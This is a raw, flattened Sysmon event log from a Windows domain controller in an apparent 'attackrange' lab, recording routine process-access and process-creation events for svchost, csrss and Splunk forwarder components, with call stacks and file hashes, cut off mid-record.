15:52:26.582{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003902Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:26.582{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003901Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:26.582{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003900Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:26.582{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003899Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:26.582{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003898Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:26.582{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003897Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:26.582{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003896Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:26.582{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003895Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:26.582{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CBA-5FA1-C300-000000008801}4744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003894Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:26.582{D28789B6-7C73-5FA1-3300-000000008801}26763928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CBA-5FA1-C300-000000008801}4744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003893Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:26.583{D28789B6-7CBA-5FA1-C300-000000008801}4744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003920Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:27.600{D28789B6-7CBB-5FA1-C400-000000008801}47284768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003919Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:27.459{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7CBB-5FA1-C400-000000008801}4728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003918Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:27.459{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003917Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:27.459{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003916Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:27.459{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003915Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:27.459{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003914Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:27.459{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003913Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:27.459{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003912Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:27.459{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003911Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:27.459{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003910Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:27.459{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003909Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:27.459{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7CBB-5FA1-C400-000000008801}4728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003908Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:27.459{D28789B6-7C73-5FA1-3300-000000008801}26763928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CBB-5FA1-C400-000000008801}4728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003907Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:27.460{D28789B6-7CBB-5FA1-C400-000000008801}4728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000003934Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:28.242{D28789B6-7CBC-5FA1-C500-000000008801}38761348C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003933Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:28.101{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7CBC-5FA1-C500-000000008801}3876C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003932Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 